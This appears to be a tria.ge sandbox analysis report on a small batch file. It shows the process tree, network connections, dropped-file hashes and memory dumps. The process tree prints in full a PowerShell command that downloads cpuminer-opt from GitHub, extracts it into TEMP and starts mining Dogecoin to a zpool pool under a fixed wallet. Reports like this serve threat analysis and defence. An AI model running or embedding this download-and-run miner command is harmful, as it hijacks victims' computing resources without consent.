Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

73u3Ito.bat

windows10-1703-x64

8

73u3Ito.bat

windows10-2004-x64

8

Analysis

  • max time kernel
    1789s
  • max time network
    1798s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-ja
  • resource tags

    arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    03/02/2024, 14:14 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    73u3Ito.bat

  • Size

    499B

  • MD5

    fe74bff27516829a88cfbc6f6e99646f

  • SHA1

    0c15d859211c79910b277d07e729bec7197a60cd

  • SHA256

    b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

  • SHA512

    a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1960
        • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4728

Network

  • flag-us
    DNS
    github.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    140.82.121.4
  • flag-de
    GET
    https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip
    powershell.exe
    Remote address:
    140.82.121.4:443
    Request
    GET /JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
    Host: github.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Sat, 03 Feb 2024 14:17:32 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Content-Length: 0
    X-GitHub-Request-Id: C2A6:157F55:1E5F6E28:1EBEEF03:65BE4B06
  • flag-us
    DNS
    objects.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    objects.githubusercontent.com
    IN A
    Response
    objects.githubusercontent.com
    IN A
    185.199.108.133
    objects.githubusercontent.com
    IN A
    185.199.109.133
    objects.githubusercontent.com
    IN A
    185.199.110.133
    objects.githubusercontent.com
    IN A
    185.199.111.133
  • flag-us
    GET
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    powershell.exe
    Remote address:
    185.199.108.133:443
    Request
    GET /github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
    Host: objects.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 18353564
    Content-Type: application/octet-stream
    Content-MD5: o9vnhIGbDner0qCCrwwyiA==
    Last-Modified: Thu, 30 Nov 2023 19:41:07 GMT
    ETag: "0x8DBF1DC4BEC4077"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d190fa92-001e-0015-362f-4ff6e6000000
    x-ms-version: 2020-10-02
    x-ms-creation-time: Thu, 30 Nov 2023 19:41:07 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    Content-Disposition: attachment; filename=cpuminer-opt-23.15-windows.zip
    x-ms-server-encrypted: true
    Via: 1.1 varnish, 1.1 varnish
    Accept-Ranges: bytes
    Age: 3348
    Date: Sat, 03 Feb 2024 14:17:43 GMT
    X-Served-By: cache-iad-kcgs7200050-IAD, cache-lhr7334-LHR
    X-Cache: HIT, HIT
    X-Cache-Hits: 628, 0
    X-Timer: S1706969863.881993,VS0,VE323
  • flag-us
    DNS
    4.121.82.140.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.121.82.140.in-addr.arpa
    IN PTR
    Response
    4.121.82.140.in-addr.arpa
    IN PTR
    lb-140-82-121-4-fragithubcom
  • flag-us
    DNS
    133.108.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.108.199.185.in-addr.arpa
    IN PTR
    Response
    133.108.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-108-133githubcom
  • flag-us
    DNS
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    Remote address:
    8.8.8.8:53
    Request
    yespower.na.mine.zpool.ca
    IN A
    Response
    yespower.na.mine.zpool.ca
    IN A
    198.50.168.213
  • flag-us
    DNS
    23.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    89.16.208.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    89.16.208.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    213.168.50.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    213.168.50.198.in-addr.arpa
    IN PTR
    Response
    213.168.50.198.in-addr.arpa
    IN PTR
    minezpoolca
  • 140.82.121.4:443
    https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip
    tls, http
    powershell.exe
    918 B
     7.0kB
     9
    7

    HTTP Request

    GET https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip

    HTTP Response

    302
  • 185.199.108.133:443
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    tls, http
    powershell.exe
    130.1kB
     7.5MB
     2807
    5445

    HTTP Request

    GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream

    HTTP Response

    200
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
     3
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
     3
  • 127.0.0.1:49929
    cpuminer-sse2.exe
  • 127.0.0.1:49931
    cpuminer-sse2.exe
  • 127.0.0.1:49949
    cpuminer-sse2.exe
  • 127.0.0.1:49951
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
     3
  • 127.0.0.1:49970
    cpuminer-sse2.exe
  • 127.0.0.1:49972
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
     3
  • 127.0.0.1:49992
    cpuminer-sse2.exe
  • 127.0.0.1:49994
    cpuminer-sse2.exe
  • 127.0.0.1:50012
    cpuminer-sse2.exe
  • 127.0.0.1:50014
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
     3
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
     3
  • 127.0.0.1:50033
    cpuminer-sse2.exe
  • 127.0.0.1:50035
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
     3
  • 127.0.0.1:50053
    cpuminer-sse2.exe
  • 127.0.0.1:50055
    cpuminer-sse2.exe
  • 127.0.0.1:50073
    cpuminer-sse2.exe
  • 127.0.0.1:50075
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    57.4kB
     45.5kB
     552
    320
  • 8.8.8.8:53
    github.com
    dns
    powershell.exe
    56 B
     72 B
     1
    1

    DNS Request

    github.com

    DNS Response

    140.82.121.4

  • 8.8.8.8:53
    objects.githubusercontent.com
    dns
    powershell.exe
    75 B
     139 B
     1
    1

    DNS Request

    objects.githubusercontent.com

    DNS Response

    185.199.108.133
    185.199.109.133
    185.199.110.133
    185.199.111.133

  • 8.8.8.8:53
    4.121.82.140.in-addr.arpa
    dns
    71 B
     115 B
     1
    1

    DNS Request

    4.121.82.140.in-addr.arpa

  • 8.8.8.8:53
    133.108.199.185.in-addr.arpa
    dns
    74 B
     118 B
     1
    1

    DNS Request

    133.108.199.185.in-addr.arpa

  • 8.8.8.8:53
    yespower.na.mine.zpool.ca
    dns
    cpuminer-sse2.exe
    71 B
     87 B
     1
    1

    DNS Request

    yespower.na.mine.zpool.ca

    DNS Response

    198.50.168.213

  • 8.8.8.8:53
    23.236.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    23.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    89.16.208.104.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    89.16.208.104.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    213.168.50.198.in-addr.arpa
    dns
    73 B
     100 B
     1
    1

    DNS Request

    213.168.50.198.in-addr.arpa

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wfkkgpix.zdf.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
    Filesize

    543KB

    MD5

    fb48f918ebd72b52e9ae61f813e83e28

    SHA1

    22cb9d4f84fce464c951009f3b10e7b6873ea40e

    SHA256

    246bdc832914a80452e1161a221bef17c2ecf2c0de3f01001b77f2bca1697206

    SHA512

    dfb2ca2c8f19277c448bb443d62a79e29a0d7de13269f34ed68b3eec89f0e56a68ef2d00d55db4c7951d7e54ae843d6706fd653d4cbe99e28ebd64ddf9e42962

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
    Filesize

    227KB

    MD5

    a75a77b04315be35f8645104498d6668

    SHA1

    3aae830fb8f22d0c7c5d27c6fceccbe16dc00a95

    SHA256

    d367e4146dba4586005fcbc5dcafbcbae7aac9940bf3e46d5bdb7daf1aa0709d

    SHA512

    41ec2627586691674519d87f73cbc65528e18c48abbbaff309c06cf907730eb07dac23455e93f7615b7c96e9610e9b2631d7599460ebc5bb0b9dca80936416bf

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll
    Filesize

    304KB

    MD5

    dbc14026b9e01167d9822c9d08b793ad

    SHA1

    bb3e0d77c7c1ac0ba95c6715d044dabcd5ff0177

    SHA256

    94fe5729ba1e3d85dc8648a707ed8a9cc73f5985fdaea1c15d6801d1fa6464fe

    SHA512

    01ebbcf0c82c7c387ce51c1420850e576943dc019d69c908e95e6029521a0e234a0dca73017187c4500dcf4752e266a27444497fefa8215c401c9712370924f3

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll
    Filesize

    378KB

    MD5

    d3ff0c97769011663e0c6d5d18f0b98b

    SHA1

    e4182047694bda997c50daade96b11b888610ae2

    SHA256

    e2175bca1d1a944e9552c3dc5446e91a3674b55b169fcf86f5cc63c5d6c69910

    SHA512

    b270d89af58b1e646b8e990a664bba6c2cdfce254d98b653f81d99a8ab950ba9ecbc9b3ff030c8affc0739b6534247791d797669aa97bae1ab36007fa822f7af

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll
    Filesize

    569KB

    MD5

    a9159855fe56d38e994a2bc1eedcc260

    SHA1

    82d1939b49919d97cf65af64689b3a9f9a3bb4a8

    SHA256

    4d1599b074cf371d8dced08517cca6d1ddf739311eeb8847fcd129f97bdcb764

    SHA512

    5790f854ce73acbbd91317eceb34e127e44828d96f443f7d40a098f8ee72f533b0865753d9f252067af9fc5a2e09caa85405cad4eb47b830b9c706a3eaca036f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll
    Filesize

    341KB

    MD5

    724a6d347be02c6b171758eac9477f61

    SHA1

    7cf6ca96392f9e8e0659333bd1feb351df28d6e1

    SHA256

    7c70c3a4625012f9e7c4a22e1fdaf5cbf3c92a82b7507c3dde164a558dc7ef99

    SHA512

    96a0a6141fc9e64adbe112470c8aba3cc1fdcbfa6148791a5746e2e1bb850d5911cbed4373788893ffe190ee509c2c3975209bcc9157f79adaa79a5fdbe6b2b2

    Download Submit

  • \Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll
    Filesize

    392KB

    MD5

    ea16c9430c28a46c029b4a867104676c

    SHA1

    cf9e7d65cddd28c45abf284463ad2c0537bffc9a

    SHA256

    d148da15587da825420d49b78a10604c8cbc6ce733593542cfab04f0a7d23506

    SHA512

    2c14b706464e57bb1c148d9eee48ff7707957d0135ad1a5d4d8d048daa07b3357a6b816d916f2e53805d51aa5cc2f8e2a0af89f4f59d0c8d695134945eb1fe9b

    Download Submit

  • \Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll
    Filesize

    462KB

    MD5

    f97ed4e6c58c8753bec6dc4439079c45

    SHA1

    91d92b2eff6ede94e595a8e0a397443b6d749411

    SHA256

    a543833439263e8b451856bdd0b465cedabfca809f0ed5e044be2ad93b63ff87

    SHA512

    c48b8132d60a5e70463b3dc87615fd6529c52eb4771ec355fff3197f1a47fafe35abb8dd3d29145119c4a9e6b3809adb97e35ed5641fee22359dac7004110cb3

    Download Submit

  • \Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll
    Filesize

    323KB

    MD5

    d9fe3afa4cc7c052df54ebead608b22c

    SHA1

    fa4b5cf9e992e1876e040c5beacd5a11b16aa495

    SHA256

    de9d95bb2cf0686124a1ded067b7460600d493cffa5af32d347fb920862c661e

    SHA512

    fc46eaa14eb47be4219adce07c9af019e7efbe79c0c034fdcb7a401f8ac2e6368a7e5d25bc98f51fe80940a8958dbd2bf01bd2aee2c04f49e6ce031ffd61dd68

    Download Submit

  • \Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll
    Filesize

    702KB

    MD5

    1b7def68e816e9dae808bbea2a51ed74

    SHA1

    6b53c462e5df1a7bb066299911a7d1bec43ee05f

    SHA256

    f6db9c0ce4cb5397db015db1e0a1b9dc6ce0f1af22675960f34e166d2e653f09

    SHA512

    d1aba2c90398eb49b05064caaa0ce74f5448698d014f6df81a5d1daed563fac8fd838699f9d2dc9969a992581bfd4a537560fe9f878f4ad769ad201eb4e5686b

    Download Submit

  • \Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll
    Filesize

    156KB

    MD5

    7f40bac455e16490fb91d7b58eea301d

    SHA1

    d23df4b43d387c08b6aee4001d132bc47c1e194c

    SHA256

    82bb7fb85f914705cc977acc71d4873b5655d92a9d8d137fdec35b15f5d571cc

    SHA512

    47400d56d7554deb05391db717cf6eb007f09e2d865021e1276d6b7fa3dd722c946f5adebd0e41694348d358598292b87547a5b24cf62c58d04b89c6f684911e

    Download Submit

  • memory/4728-131-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

    Download

  • memory/4728-126-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

    Download

  • memory/4728-189-0x0000000077A60000-0x0000000077AF8000-memory.dmp

    Filesize

    608KB

    Download

  • memory/4728-181-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

    Download

  • memory/4728-174-0x0000000077A60000-0x0000000077AF8000-memory.dmp

    Filesize

    608KB

    Download

  • memory/4728-171-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

    Download

  • memory/4728-166-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

    Download

  • memory/4728-159-0x0000000077A60000-0x0000000077AF8000-memory.dmp

    Filesize

    608KB

    Download

  • memory/4728-156-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

    Download

  • memory/4728-151-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

    Download

  • memory/4728-144-0x0000000077A60000-0x0000000077AF8000-memory.dmp

    Filesize

    608KB

    Download

  • memory/4728-141-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

    Download

  • memory/4728-130-0x00000000010D0000-0x0000000002985000-memory.dmp

    Filesize

    24.7MB

    Download

  • memory/4728-129-0x0000000077A60000-0x0000000077AF8000-memory.dmp

    Filesize

    608KB

    Download

  • memory/4728-128-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4728-127-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

    Download

  • memory/4980-28-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4980-10-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4980-6-0x0000029336D30000-0x0000029336D40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4980-7-0x0000029336F70000-0x000002933707E000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/4980-8-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4980-4-0x0000029336DC0000-0x0000029336E52000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4980-11-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4980-5-0x0000029336D50000-0x0000029336D72000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4980-13-0x0000029337100000-0x0000029337176000-memory.dmp

    Filesize

    472KB

    Download

  • memory/4980-35-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4980-31-0x0000029337280000-0x0000029337296000-memory.dmp

    Filesize

    88KB

    Download

  • memory/4980-33-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4980-34-0x0000029336CC0000-0x0000029336CD0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4980-113-0x00007FF96A640000-0x00007FF96B02C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4980-69-0x00000293370D0000-0x00000293370DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4980-56-0x00000293372A0000-0x00000293372B2000-memory.dmp

    Filesize

    72KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.